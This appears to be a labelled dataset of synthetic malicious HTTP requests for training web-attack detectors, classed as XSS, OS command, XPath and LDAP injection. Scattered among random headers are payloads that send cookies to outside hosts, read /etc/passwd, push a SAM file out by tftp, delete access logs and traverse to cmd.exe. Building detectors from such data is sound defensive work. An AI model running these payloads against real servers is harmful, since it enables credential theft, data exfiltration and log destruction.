Warning: 093 www.Ieie.htm "d6amUeljrciludeds4l" "Sat, 17 May 08 17:12:51 UTC"
X-Forwarded-For: 171.203.103.227
X-Serial-Number: 61503803
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35735
Start - Id: 46670
class: XSS
GET /spAyqimsuTDhineec/.T60-gecho/txdTar/rGJTmsKkb/ovXbpezkX/r3w/mh4eWYklFb8@SHUYlBH.css? HTTP/1.1
Host: 232.67.77.111:80
Connection: nohEmt
Accept: image/png, text/*, image/*;q=0.1
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.6
Cache-Control: max-stale
Client-ip: 162.233.42.246
Cookie: a1nr8Nt=<script   >alert (fpdrghsi.rPeo)</script>
Cookie2: $Version="89"
Date: Mon, 16 Mar 09 24:38:01 UTC
ETag: "eb5I9626qeLWu.ltEh"
Expect: 100-continue
From: os7ddt@2hedt3.cz
If-Modified-Since: Tue, 20 Apr 10 17:10:17 UTC
If-Unmodified-Since: Tue, 02 Jan 07 22:03:53 UTC
If-Match: "qkzcRq2oXj3eBGtU0V4"
If-None-Match: *
If-Range: *
Max-Forwards: 6129
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: Digest opaque="es5nbc"
Authorization: Basic RWVpbTl3aDphYXNlcg==
Range: -3820,-75
Referer: /wcnn/77SNte/3nul6g/inli0db.mdb
TE: trailers,gzip;q=0.8
Trailer: Referer
User-Agent: Mozilla/3.6 (Windows; U; WinNT 1.5; np-dl; rv:7.1.2) Gecko/88488853
UA-CPU: PowerPC
UA-OS: Linux
UA-Color: color8
UA-Pixels: 630x4242
Via: HTTP/0.3 www.4oaldret.jpg:2, nnEpa/7.3 135.101.205.145, 4.3 148.130.105.172:666
Transfer-Encoding: identity
Upgrade: sNn/2.2, tbnncm/6.1
Warning: 792 204.144.50.16 "veibcehaticgi" 
X-Forwarded-For: 180.229.29.245
X-Serial-Number: 19077842196498
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46670
Start - Id: 42948
class: OsCommanding
GET /AoptULYCTLavbscript/k_nsxIDI.Voq8.php4?wcaor5isrueaux=850 HTTP/1.0
Host: 55.152.166.112:2927
Connection: hmvoe
Accept: text/*;q=0.3
Accept-Charset: koi8-r, windows-1252, x-mac-roman;q=0.6, x-mac-roman
Accept-Encoding: 
Accept-Language: u-as4atis;q=0.4, tiaa8-z;q=0.9, ra-roeocdt;q=0.8, Atejt-rcm;q=0.9, mho-utA
Cache-Control: hrdiEw=ad
Client-ip: 235.32.163.173
Cookie: rGlNhnAnrus=ofoeeopuonaniLnre;ad=374;MinsertEur1nGr=s4ZFY3Q4Y
Cookie2: $Version="8"
Date: Wed, 05 May 10 14:14:27 UTC
ETag: W/"7U_s6vzue.sjFf@9"
Expect: nes5git=atdaShae;HDSj=bcepo4em
If-Unmodified-Since: Tue, 03 Aug 04 22:37:19 CET
If-None-Match: "-5dlGl9EYj99wGM"
If-Range: Wed, 06 Sep 06 19:30:07 GMT
Max-Forwards: 9932
Referer: /zhs8pab/iiEg/aiee/ncs7/7Cate.txt
TE: trailers,gzip;q=0.7,trailers
User-Agent: |    /bin/cat     /etc/passwd%00.html
UA-Color: color8
UA-Pixels: 5826x272
Via: ar6o/2.0 www.selecC.png:754, FTP/2.5 www.Xwbrevu.png, 4.8 93.233.130.156
Transfer-Encoding: gzip
Upgrade: cml/5.9
----: -----------------

null

End - Id: 42948
Start - Id: 47105
class: XSS
GET /h@7pzsPrS/d8@.uvOCb7o1jZzRO.shtml?soU-LUVXxp_KSG=5303681594&aamoicaidshtEri=rdeq&UwpositionscriptP=1757665&aentirojU=%3Cimg%2Bsrc%3Djavascript%3A++alert++++%28%27arr.nglsK%27%29%3E&zndx=0&a-gYGaM=asytI&istdinLiOtmpCyA8r=n9+%2F%24&tneOeeaeOmiee=npaf3.IY-&loioat=98&niii=ahrs+o&un0frrettGt=oprocessing-instructionrhe%26%25u6ellnt%3E&hRwF.libKc=hinputodocument3g%3C%29ilinkdrd%3F%5Blibyaccess_log+&teehrtbhonEhwig=dr5m&10wr7or2=ve HTTP/1.0
Host: www.sElbd9a6fe.st
Connection: snyl
Accept: video/quicktime
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: rT1en-nerRlpn;q=0.9, 5EdErs0e-i7m, otz-b8Yssleo;q=0.4
Cache-Control: no-cache
Client-ip: 51.141.13.228
Cookie: z8h-90G3WE=sAea7;omn=xubrperl17>8
Cookie2: $Version="1"
Date: Fri, 02 Jan 09 16:09:44 UTC
ETag: W/"0k_Eh5QzzVf7sgiEF"
Expect: hi8nsb
From: Srtniim@ss0iltolEd.ch
If-Modified-Since: Sat, 25 Nov 06 06:22:33 CET
If-Unmodified-Since: Mon, 06 Sep 04 18:16:09 CET
If-Match: *
If-None-Match: "8iBwiaply5Ojf4vU4"
If-Range: *
Max-Forwards: 69
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: NTLM bXI4YTU4YmF1b3RvaW90YXlMNTNubXFlZmVsYXNQcmVtY29hdHJpdEU=
Authorization: clanh toeioab=N3shitr
Range: 74-7756,9-
Referer: http://i0srbe.be/thrdxul/zeg2tp.asmx
TE: trailers,trailers,trailers
Trailer: If-None-Match
User-Agent: Mozilla/2.6 (X11; U; Linux i386 2.2; gn-oa; rv:4.8.2) Gecko/89428292
UA-CPU: StrongARM
UA-Disp: 016,6175,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 320x898
Via: 1.8 15.193.81.129, 1.5 www.Oovo.png, 8.2 239.128.12.0
Transfer-Encoding: deflate
Upgrade: mnyt/9.5
Warning: 241 140.186.56.188 "eynAOe7ebztnrt" 
X-Forwarded-For: 32.49.185.177
X-Serial-Number: 236782108
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47105
Start - Id: 44607
class: OsCommanding
GET /9Vxs7Sy7gO/dhaoeefhinep8a/sbbeoo/5elrka.cfm?bC=eeyahhhd+a&5edropologusrS.mxp=nnnSdd4e&iscot09ane=hS&tfh7e1=70.64.106.74%7C++tftp++-i+++12.227.7.161+++++PUT+sam._&fsIytae=document0%2Boran+6rN&WN-PS=7771&l5=%29&j4irm=ut&GLySXvLnodeEoOV=09575&b3mem0oiltneyf=0828&eoae1=maataAe%3Eaaq%7Cao&aleg1ssatc=suljueerxl HTTP/1.0
Host: 89.252.133.171:27
Connection: close
Accept: */*;q=0.6
Accept-Charset: iso-8859-8-i, koi8-r;q=0.9, windows-1250;q=0.7, iso-8859-6
Accept-Encoding: deflate, identity, deflate;q=0.6
Accept-Language: *
Cache-Control: max-stale
Client-ip: 234.131.254.239
Cookie: Csaehdtthkjnhj=802;eci=626936;lmo=7;li5vaeT3sItggeu=10647
Cookie2: $Version="11"
Date: Sun, 14 Mar 10 19:35:05 GMT
ETag: W/"0iYg@SMqR@Wb_t3R"
Expect: 100-continue
From: 8sf9@dbeln5gatO.gov
If-Modified-Since: Sat, 11 Jun 05 01:48:43 CET
If-Unmodified-Since: Thu, 05 Oct 06 12:29:28 UTC
If-Match: "gBM_dAGU6ieKTuaJLGaJ"
If-None-Match: *
If-Range: "wS1FdB.kn_N9Amme00j"
Max-Forwards: 7
MIME-Version: 1.7
Pragma: 1ctau='0u'
Proxy-Authorization: ozleh5 vvuEC=0hotw
Authorization: Ntiork yesrssnr=smegluuc
Range: 41676-
Referer: http://www.xzEadEc.st/tti3hat5/aamlnda/SrsXhi.nsf
TE: deflate
Trailer: Trailer
User-Agent: uuIm8LARuM http://www.cIsrk.fr
UA-Disp: 0488,6492,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 494x0584
Via: HTTP/4.4 191.31.16.89, 4.9 135.206.46.110
Transfer-Encoding: deflate
Upgrade: sraa/8.7, apdat/7.5, Eir8/9.0
Warning: 294 www.eeugeo2c.png "bVo5d8oDShGrt1n" 
X-Forwarded-For: 84.212.52.145
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 44607
Start - Id: 44271
class: OsCommanding
GET ..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.ota3zg.ch
Connection: ud5f
Accept: application/*, image/*
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.5
Accept-Language: g-oeot1n, tta-d
Cache-Control: max-age=834
Client-ip: 208.204.2.15
Cookie: uLpoygenej=703;shhnptnx=72;xsL8m5tqstw=ieutdn4ideaFcbb;6oNHcmd=117
Cookie2: $Version="544"
Date: Fri, 21 Dec 07 10:15:23 GMT
ETag: W/"JQx0uHTwXQsPyN32k.C"
Expect: 100-continue
From: iefdsb@2Nyh.org
If-Modified-Since: Mon, 27 Mar 06 18:15:17 UTC
If-Unmodified-Since: Fri, 01 Dec 06 21:46:37 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 276
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: NTLM VGxycmhjbG53cjdsc0Z0aWVuaGl0bmVib2lhZWk3U2ljYXZ4bnNpb2JybG0=
Authorization: ut2ox dtgbj=visno
Range: 1630-9,-816
Referer: /ennnH/sbotront.php4
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/9.0 (Machintosh; U; PPC Mac OS X 6.6; tl-ah; rv:8.1.6) Gecko/43532436
UA-CPU: 68000
UA-Disp: 9070,4804,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 7064x6561
Via: 3.7 18.162.215.2, tNl/9.7 www.Htal.htm:9
Transfer-Encoding: identity
Upgrade: coeeIl/9.2, natae/9.1, hi4/9.9, 3tu3nt/4.6, epa5c/2.6
Warning: 674 28.181.161.239 "fsbetechtt6msa4eu" 
X-Forwarded-For: 209.233.129.22
X-Serial-Number: 87791101469123011682
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44271
Start - Id: 48193
class: XSS
PUT /eohsamf0arftksqse.msf? HTTP/1.0
Content-Length: 145
Content-Language: huibi4Ha
Content-Encoding: identity
Content-Location: /hcir.ace
Content-MD5: c2VodmJvcmhkbFllMzIyaw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 23 Jan 08 18:52:02 CET
Last-Modified: Tue, 08 Jul 08 24:20:59 CET
Host: 92.143.45.84
Connection: close
Accept: */*
Accept-Charset: shift_jis, cp-932;q=0.8, x-mac-korean;q=0.9, iso-8859-6;q=0.2
Accept-Encoding: <img    src   =  "javascript: [document.location.replace    ('http://www.tana.com/cgi-bin/meet.cgi'+document.cookie);]" >
Accept-Language: rean-h, leht-icteah, ahske-atiBsl;q=0.2, siseci1-lqa;q=0.3, ts7gF-i
Cache-Control: max-stale
Cookie: t8oeabdlejctt=-n;mltWtnj=)1|iymo\perlwsm|esa;8ces=wcuGV_cMjGz;hsoL=e\Aan
Date: Sun, 18 Sep 05 15:08:52 CET
ETag: W/"Jexh6JUi9RPoL60oN"
If-Modified-Since: Tue, 27 Sep 05 22:16:13 GMT
If-Unmodified-Since: Tue, 21 Oct 08 21:33:37 UTC
If-Match: *
If-None-Match: ".eYI.5rTp@Dan.iaHLS"
If-Range: *
Max-Forwards: 9896
Pragma: no-cache
Authorization: NTLM Z2FJaTZueWx3cm5jZWV0aXQ4ZXRMbmFweWl1c0Rpdm5zeHg=
Referer: http://www.oaeTjn.com/eotsn/cbamaea/MhTo/3medeeg.sh
TE: trailers,trailers
Trailer: If-Range
User-Agent: edi9ae
UA-OS: Mac OS X
Via: 6.6 120.242.111.9, HTTP/2.8 128.51.243.37, 8.1 224.99.194.218:87
Transfer-Encoding: veob; itSfenR=imrocfoh
X-Forwarded-For: 251.96.98.120

f2tnr=idvbscript  +eghaw&gvor4iu=8&5KP0TRrZz=xLybisofrtaeIfh&Rmrv6anyy9h0E=gvduoTMmcyrp&qocroesZ= xmlh &0motugEQswai=S-netcats&aactecoAiilo=525

End - Id: 48193
Start - Id: 44266
class: OsCommanding
GET /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+ HTTP/1.0
Host: 38.107.18.15
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: gc4e-sii;q=0.6, haauE-5e8gtfs;q=0.0, xrw-tphpq9, 2rEra-dbkmfm;q=0.9, tE-iek;q=0.3
Cache-Control: max-age=834
Client-ip: 225.50.172.247
Cookie: istTyrtPe=629;miheazelr=836;mgnc.3U=60;0ennidhshek=h1LVrge;yecld2i=26140631;eea5et0gu=ihdsdAt24veie
Cookie2: $Version="544"
Date: Sat, 21 Feb 04 03:19:49 CET
ETag: W/"JQx0uHTwXQsPyN32k.C"
Expect: 100-continue
From: Ce9h0dvt@naeheOu.st
If-Modified-Since: Mon, 19 Sep 05 05:53:20 GMT
If-Unmodified-Since: Fri, 07 Apr 06 21:48:04 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 4163
MIME-Version: 4.2
Pragma: at7b='e'
Proxy-Authorization: YOigog n4on=aery00e
Authorization: Digest algorithm=osHre
Range: 1630-9,-816
Referer: http://www.eiasnit.st/f9t4natE/ofur/acdh/rp1DU.jpg
TE: gzip;q=0.0,chunked,deflate
Trailer: Referer
User-Agent: npjD4en
UA-CPU: 68000
UA-Disp: 9070,4804,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 7064x6561
Via: HTTP/0.2 www.hCtumm.html, FTP/7.8 www.hlrme.png
Transfer-Encoding: gzip
Upgrade: ytc/5.0, mosem/3.9
Warning: 674 28.181.161.239 "fsbetechtt6msa4eu" 
X-Forwarded-For: 209.233.129.22
X-Serial-Number: 87791101469123011682
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44266
Start - Id: 49005
class: XPathInjection
GET /it/lnrbcSl8zd/rmywLlocationCaselect@Cur/iogJfciG2K.CAvB3LT/oKq.php4?ep=dh%3A&xp_kRphpXS=anhx%2Frek%2Fbly%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D717%5D+or++++%27rcfeT%27+%3D++++%27&sdpnsuqs=e HTTP/1.1
Host: www.et5es9f.biz
Connection: close
Accept: */*
Accept-Charset: iso-8859-5, windows-1252, iso-2022-jp;q=0.9, iso-2022-kr;q=0.6
Accept-Encoding: *
Accept-Language: mr-1ewaapeg, iisgCJ0t-edoAeIa, ogaiee-Snebnom, oeaia-a;q=0.1
Cache-Control: max-stale=64491
Client-ip: 144.42.96.134
Cookie: 6noamn=s
Cookie2: $Version="6"
Date: Sun, 12 Mar 06 08:33:15 GMT
ETag: "FA_sGMcegLbQEav"
Expect: 100-continue
From: w6wr@nytn.it
If-Modified-Since: Sat, 11 Aug 07 17:48:17 GMT
If-Unmodified-Since: Tue, 07 Apr 09 09:03:04 UTC
If-Match: *
If-None-Match: "p-GEtbl5TnHD9-w"
If-Range: "iZm_0vun_wVTYBE"
Max-Forwards: 1
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: Digest nc=2FF0fE2f
Authorization: Basic dGVlcm46aW1jeGlh
Range: -520,420265-,87-062067
Referer: http://rdai.de/igtxe6/trr1/nlea/remTj7x.mspx
TE: deflate,chunked
Trailer: Accept
User-Agent: Mozilla/4.8 (X11; U; Linux i386 0.7; wr-io; rv:4.5.8) Gecko/95486676
UA-CPU: 68000
UA-Disp: 787,994,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 4233x4601
Via: 0.2 www.hHmaC6t.jpeg:289
Transfer-Encoding: gzip
Upgrade: meeoe/8.2, nir2fe/4.3, eS7e/1.8, nerHu/7.3
Warning: 893 www.orci.jpg "9g1en4itrrimothb4" 
X-Forwarded-For: 85.135.62.221
X-Serial-Number: 544350626543951868
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49005
Start - Id: 47544
class: XSS
GET /irriee/h9Ebbliir/includeK3HGVg5d_/a_7J/eice9intshsnr/SFautoexechttpsNforFMsystemh/deDsai4eisa.html?tsfbolc=nKcLa&jnktinErNn=ai&aoutphf2=rt7&ou6e=eistdinMlhn%3Dtdsa5&jpHJ=%3Cobject+++classid++++%3D++++%22++clsid%3A...++%22++codebase+++%3D++%22+javascript%3A++%5Bwindow.open%28%27http%3A%2F%2F230.174.34.224%2Fnd.msf%27%2Bdocument.cookie%29%3B%5D+++%22++++%3E&eaoutRahe=o51&inmqq=sm&iht=todyeiueug HTTP/1.1
Host: 169.184.118.132:2
Connection: close
Accept: audio/*
Accept-Charset: x-mac-greek;q=0.5, cp-936, x-mac-chinesesimp, macintosh, euc-cn
Accept-Encoding: 
Accept-Language: nbr-dOeitS;q=0.7, elipi-so26ewgS, laititns-gben, a-s;q=0.9
Cache-Control: no-cache
Client-ip: 124.42.14.246
Cookie: 6hait=yx5hltsre;otomwhch=0308182758;Tr=ehitout<mttr;Tx@FRc-U=1418809043;5edy=cSRhgO@1BRjy
Cookie2: $Version="5"
Date: Wed, 06 Apr 05 24:10:22 UTC
ETag: "Ala8XxVK9Sh-lb6G@F"
Expect: Aaakre3t=bPm8Duh;h4pbg6
From: sevLsg9@hooNmu.fr
If-Modified-Since: Sat, 08 Sep 07 24:51:27 CET
If-Unmodified-Since: Fri, 05 Mar 10 13:57:45 UTC
If-Match: *
If-None-Match: "nlPvheeUYn6NMvD."
If-Range: Sun, 21 Sep 08 21:52:12 UTC
Max-Forwards: 6
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: Digest uri=/kldnret/2UzEy/cbia3dnl.aspx
Range: 8094-,77-91254,-8945
Referer: /e5eoshmD.gz
TE: chunked
Trailer: If-None-Match
User-Agent: Mozilla/8.7 (X11; U; Unix 0.7; n0-tN; rv:9.7.2) Gecko/35218058
UA-CPU: PowerPC
UA-Disp: 050,2452,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 2187x3503
Via: FTP/6.2 www.h68e2r.js:632, FTP/5.5 192.32.11.206:4468, 5.6 www.sewre.js
Transfer-Encoding: deflate
Upgrade: sdout/1.8, ioe/1.0
Warning: 992 www.4eiian.js "meeteeolpwgufO" "Tue, 02 Mar 10 02:39:00 CET"
X-Forwarded-For: 112.231.125.157
X-Serial-Number: 57604389
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47544
Start - Id: 49631
class: XPathInjection
GET /ikUolZ9C5CMb1Ki.dll?ktodleK=765377433&rcoetm=ot&lyPEatp13KoRA=03&yigdsT=068915&soetsoKud6itt7=i&fsT8hrpntoh7=rd+rdotireots&MAphp-HP3jruep=TdtJioe-n&NorTasomrhne=aOi&ftds5inbphm92et=%28i+%3C++++count%28qrspt%2Fchild%3A%3Atext%28%29%29+and++++j+%3C++count%28meo%2Fchild%3A%3Acomment%28%29%29++and++k++++%3C+++count%28oos%2Fchild%3A%3A*%29++%29&l5dnkHodalrw=lkxK.6c&uknaehD8ural5=jduzenecRtEwmsnh&ymUds82rByai=slnaa5r9ymjarIh&senw=ee%22%22o&yniia7=88 HTTP/1.1
Host: www.ap6w.fr:80
Connection: close
Accept: */*;q=0.4
Accept-Charset: windows-1250;q=0.5, windows-1251;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 72.69.9.83
Cookie: eaahSiegni= eLbe8
Cookie2: $Version="34"
Date: Wed, 23 Feb 05 03:30:59 CET
ETag: "GMdmS@y1YneGll6"
Expect: 100-continue
From: nUasei3i@d2es4pty6e.biz
If-Modified-Since: Fri, 13 Apr 07 14:00:27 UTC
If-Unmodified-Since: Wed, 09 Apr 08 09:03:27 CET
If-Match: *
If-None-Match: "9I-KN992UTWIsHB0t"
If-Range: *
Max-Forwards: 9
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: NTLM YmVuNjVoOXRhdHJlbmVkanNzYWhuY1Qzc1Nla3NvZW5obmh0
Authorization: NTLM aWNzdTJlenVtc2FmZHVwcmhpMG90ZWF0M3I1cm9lZXI=
Range: 31-025167,936-84
Referer: http://dwrNtt.uk/uVln/iAlao.jpeg
TE: trailers,trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/2.6 (Machintosh; U; Mac OS X 7.9; gp-eg; rv:4.9.4) Gecko/81137032
UA-CPU: PowerPC
UA-Disp: 3477,0438,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 3223x940
Via: ctiaM/5.0 161.184.160.181:7, FTP/6.0 189.149.137.117
Transfer-Encoding: deflate
Upgrade: hZair/3.0, n6coi/9.2, gii/4.7
Warning: 750 www.Semo.html:72929 "jrrA0ies6s28ioso" 
X-Forwarded-For: 118.127.121.36
X-Serial-Number: 9696710
----: -------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 49631
Start - Id: 49691
class: XPathInjection
GET /dWS54zUZT8qJ648/eg7LUhEl2Mx91P0KMs/isb@Y8k4kjEGkseH/c7v2/gjNilmlcpnetull4cmn/t4oZ_2hA2eWlmIwnwlp/reoflAlekTtEoTt3loop/WtPzWn/5rjz8bs4DZIVXWKjM/el9edZ55Yadmincatm_8F/9h1loth2tet.cgi?se=f9%27+++or++++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D++++or++++%27in%27++++%3D++%27 HTTP/1.1
Host: 162.166.83.129
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: pgiE0qj-r4rciT, eteLntHl-px, cue7de-Vro;q=0.2, iirsf2l-ma0sE, eccAfiu-oretNkTt;q=0.8
Cache-Control: max-age=491
Client-ip: 108.128.7.126
Cookie: ldeq0h=ysLA6bB3CnA;uw=sN2wA;q6ejseedtq10s=3594552493;oJniD4VuH=slhasIansmrRted1
Cookie2: $Version="357"
Date: Tue, 10 Feb 04 06:29:56 GMT
ETag: W/"rxcndMh1TvLBsYH"
Expect: Aahhoh
From: tmHtei@9Eaetn4.de
If-Modified-Since: Tue, 27 Apr 04 21:14:11 CET
If-Unmodified-Since: Tue, 20 Feb 07 18:45:47 GMT
If-Match: *
If-None-Match: "cldRSY9gTrrhajuH4"
If-Range: "nuu7cjCe855KxP@P.N"
Max-Forwards: 08
MIME-Version: 7.7
Pragma: k1ehsu1=d
Proxy-Authorization: NTLM b2RuZWV0bGVubm5nb2huU3diYWZibW9uc3BlRHp2dG1jYXdiZWNsM0FlNXM=
Authorization: Basic amFucm86YWVOdW9l
Range: -394122
Referer: http://www.oml2.it/cttrea/enw8s/denn/h4tke28/isrvsld.pdf
TE: trailers,chunked,trailers
Trailer: Range
User-Agent: Mozilla/2.1 (X11; U; Open BSD i586 3.8; o3-ir; rv:8.4.2) Gecko/05166300
UA-CPU: StrongARM
UA-Disp: 2722,5111,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 5244x685
Via: HTTP/6.2 165.5.134.195, hhe/3.6 www.Yaein5.htm:9827, 9.7 www.eslld2F6.png
Transfer-Encoding: compress
Upgrade: reeei/0.0, w2wde/2.4, e58a/5.6
Warning: 928 www.sea4hf7.png:6529 "guetn6bIulNebhuhnEd" "Fri, 08 Apr 05 24:10:56 UTC"
X-Forwarded-For: 76.177.20.101
X-Serial-Number: 7269529706090781
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49691
Start - Id: 36491
class: OsCommanding
GET /bin/alibaba.pl|dir ..\\..\\..\\..\\..\\..\\..\\,? HTTP/1.0
Host: 81.141.156.179:80
Connection: close
Accept: */*
Accept-Charset: x-mac-korean, x-mac-hebrew;q=0.5, windows-1255;q=0.0, windows-1252;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: aEtg='gsdpo'
Client-ip: 219.137.139.146
Cookie: flEA=hlib1se;tawiteenmei=iomh
Cookie2: $Version="38"
Date: Sat, 02 May 09 09:58:42 UTC
ETag: "EEjfH1qoZefe@m2kmR"
Expect: toexim=komsian;tOnhH
From: n8us@72HjX.ch
If-Modified-Since: Sun, 26 Sep 04 13:52:36 GMT
If-Unmodified-Since: Wed, 26 Jul 06 01:18:34 GMT
If-Match: "8NqOGhZtd.10osrYsCUi"
If-None-Match: *
If-Range: Thu, 17 Aug 06 17:47:41 UTC
Max-Forwards: 960
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: iuqrt iwRdnnb=pgerxsn
Authorization: Digest response="4AdCbc36bEA17CfdadceF93AE68fFB25"
Range: 998505-,-0540,815-
Referer: http://www.otkdnIl.de/ahOH/eehab63r/s9i3Yale/Uuksj/0o6at.jpeg
TE: trailers
Trailer: If-Modified-Since
User-Agent: eG3ckcu. http://www.grFr.gov
UA-CPU: MIPS
UA-Disp: 900,140,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 512x1298
Via: HTTP/6.9 www.rotod.css
Transfer-Encoding: identity
Upgrade: 0evvr/2.8, nciwf/9.2, ont/1.4, srn/0.0
Warning: 640 191.249.103.192:8645 "na5Hiio6yds" 
X-Forwarded-For: 29.11.215.219
X-Serial-Number: 5785430371432590
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36491
Start - Id: 43511
class: OsCommanding
GET /y9ErEawaolTeE6amtrsr/aiatgavmihi/et/pKerrx.jpg?gmd0=sptrsRlIRrAse&Eiea2e14tGeisoe=ttG&gjt229=ucGC&azh=54050&pCwCh3wMIzdT=u&c5s=9486760&qtneap3lI=%250arm+-f+++%2Fvar%2Flog%2Fhttpd%2Faccess_log++%3B&eopHf=wiiAoS HTTP/1.0
Host: 23.109.47.3
Connection: sEsl
Accept: audio/x-wav;q=0.5
Accept-Charset: macintosh;q=0.7
Accept-Encoding: gzip, identity;q=0.1, gzip;q=0.6, identity;q=0.0
Accept-Language: 0-oeejnIY
Cache-Control: no-store
Client-ip: 108.184.195.217
Cookie: O2Kbodylwinnt-J5SA=2affa;l1ano=781;rn9undree0=0970613;Es=urmxstIecxNew;esret9=he=/;6a=nhn
Cookie2: $Version="916"
Date: Mon, 29 Mar 10 02:06:36 GMT
ETag: "PxnNJB_jtB5FqDUJ"
Expect: 100-continue
From: rb2eklg@erhan.net
If-Modified-Since: Tue, 20 Nov 07 10:37:09 CET
If-Unmodified-Since: Mon, 08 Nov 04 16:29:50 CET
If-Match: *
If-None-Match: "P-yUhU_dJIveflm"
If-Range: Mon, 10 Dec 07 23:18:19 CET
Max-Forwards: 7
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Basic bFJvZ25nOmVmVGNx
Authorization: Basic ZWJ1end0Ojh0SGF0Uw==
Range: 32-61,4386-85
Referer: /ia4e/eoecuc/kra9aqie/6Oks.php
TE: trailers,deflate;q=0.5,trailers
Trailer: Range
User-Agent: hqwm4RB4V http://www.delm.biz
UA-CPU: MIPS
UA-Disp: 034,8508,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 5281x2497
Via: 7.6 84.74.1.199
Transfer-Encoding: compress
Upgrade: tlle/3.2, ouiu/2.7, 6nb/4.0, iuoaC/4.5, ioatma/4.1
Warning: 156 193.81.211.74 "9aeu3wesnnaer" 
X-Forwarded-For: 134.201.54.76
X-Serial-Number: 521013041943
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43511
Start - Id: 39039
class: LdapInjection
POST /d8E/rshO94KkP3wEyLWuq/metaEvpCgroup by/rVqT.@4YgW/Jls9TNg_LAH5/a1ssnfd2Lcieagcmm/9LuBahL.css? HTTP/1.0
Content-Length: 101
Content-Language: 5pervi
Content-Encoding: compress
Content-Location: /2Neb.avi
Content-MD5: YW1vWm9zZU5uZWJydFJmbQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 29 Jan 08 09:15:07 CET
Last-Modified: Sat, 03 Jun 06 06:09:24 GMT
Host: 100.15.217.81:92
Connection: close
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: )( |    ( cn=*o  'brien*   )(mail   =*o   'brien*  )   
Accept-Language: *
Cache-Control: max-age=0103
Client-ip: 98.197.175.244
Cookie: mesvoi=%ep;stnotanaatwns=riianbose1z;zet=23718460;smeaidrE=4>p
Cookie2: $Version="6"
Date: Sat, 04 Oct 08 17:23:28 CET
ETag: "qrE-ovJp0PolKoL1u4cC"
Expect: 100-continue
From: n1eboh@st19rPen.org
If-Modified-Since: Sat, 30 Jun 07 09:40:42 CET
If-Unmodified-Since: Thu, 24 Jun 04 15:22:28 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 22 Jun 07 15:49:39 UTC
Max-Forwards: 7096
Pragma: no-cache
Proxy-Authorization: Digest cnonce="8rHeigo"
Authorization: Basic cFRlbDphNzVzbHI=
Range: -4
Referer: http://www.eaaomhs.ch/VltCuwos.msf
TE: gzip;q=0.9,chunked;q=0.7,trailers
Trailer: If-Modified-Since
User-Agent: It4rcaqemt (hq.a0o; snixzS32; h3Kz.jefh)
UA-CPU: MIPS
UA-Disp: 720,158,16
UA-Color: color8
UA-Pixels: 183x5946
Via: 7.6 102.153.25.55:35
Transfer-Encoding: deflate
Warning: 184 201.174.35.89:741 "pn1en0ohpElcexnsIrn" "Tue, 06 Jun 06 13:35:25 GMT"
X-Forwarded-For: 157.105.101.82
X-Serial-Number: 8237003148832
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~

torrAon=31&tUafj=y-dS.75X&DIruttml=ezrvMHH8&lqehtsahs=9700&TvarTJscript=eEhaeutih9arnp&rsieqoelic=ieg

End - Id: 39039
